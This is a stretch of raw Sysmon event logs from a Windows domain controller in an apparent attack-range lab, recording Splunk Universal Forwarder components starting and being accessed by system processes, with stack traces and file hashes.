Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-49BF-6000-7F05-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49BF-6000-7F05-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.924{08A6967A-49BF-6000-7F05-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49BF-6000-7E05-000000009A01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-49BF-6000-7E05-000000009A01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.251{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49BF-6000-7E05-000000009A01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.252{08A6967A-49BF-6000-7E05-000000009A01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49C0-6000-8005-000000009A01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-49C0-6000-8005-000000009A01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.595{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-49C0-6000-8005-000000009A01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.596{08A6967A-49C0-6000-8005-000000009A01}5772C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:16.079{08A6967A-49BF-6000-7F05-000000009A01}49726196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.657{08A6967A-49C1-6000-8105-000000009A01}59965136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49C1-6000-8105-000000009A01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:17.501{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 